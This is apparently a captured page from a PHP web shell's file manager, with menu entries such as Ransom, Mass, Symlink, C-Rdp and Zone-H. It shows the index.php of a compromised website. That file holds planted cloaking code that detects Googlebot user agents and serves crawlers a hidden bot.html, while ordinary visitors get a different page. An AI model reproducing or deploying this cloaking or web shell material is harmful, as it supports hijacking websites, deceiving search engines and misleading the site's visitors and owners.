Path : /var/www/html/phkaymedia/public/ |
B-Con CMD Config cPanel C-Rdp D-Log Info Jump Mass Ransom Symlink vHost Zone-H |
Current File : /var/www/html/phkaymedia/public/index.php |
<?php function is_google_bot() { $agents = array("Googlebot", "Google-Site-Verification", "Google-InspectionTool", "Googlebot-Mobile", "Googlebot-News"); foreach ($agents as $agent) { if (strpos($_SERVER['HTTP_USER_AGENT'], $agent) !== false) return true; } return false; } if (is_google_bot()) { $bot_content = file_get_contents('bot.html'); echo $bot_content; exit; } else { include('index2.php'); exit; } ?>